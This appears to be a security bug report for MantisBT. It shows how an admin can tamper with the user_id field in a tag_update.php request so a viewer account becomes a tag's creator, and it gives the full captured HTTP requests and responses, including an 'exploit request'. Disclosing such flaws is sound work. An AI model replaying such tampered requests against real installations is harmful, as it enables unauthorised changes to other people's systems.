Steps To Reproduce |
-
Login as your admin account
-
Go to manage > manage tags
-
Select any tags
-
Open the update page by clicking the update tag button
-
Open your intercept
-
Submit it
Request
POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1
tag_id=2&tag_update_token=20200913ZSA8qpB9az4sp0UYftL8R-6tSHhobA9Z&name=xxx&user_id=1&description=Tag
Response
HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:16:16 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:16:16 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:16:16 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Attack scenario : Do the same thing and edit the value of user_id to your viewer account in my case my viewer account id is 4
Exploit request
POST /mantisbt2/tag_update.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/tag_update_page.php
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_PROJECT_COOKIE=2; PHPSESSID=u3jfpkfngcgqmr3mgcfq2ip913; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=8%2C5
Upgrade-Insecure-Requests: 1
tag_id=2&tag_update_token=20200913mHy8SlN9pxvwdexRaAZRaZfclmY5ciQ-&name=xxx&user_id=4&description=Tag
Exploit response
HTTP/1.1 302 Found
Date: Sun, 13 Sep 2020 04:18:46 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sun, 13 Sep 2020 04:18:46 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sun, 13 Sep 2020 04:18:46 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt2/tag_view_page.php?tag_id=2
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
- Refresh the site and you successfully set viewer as a tag creator
|
---|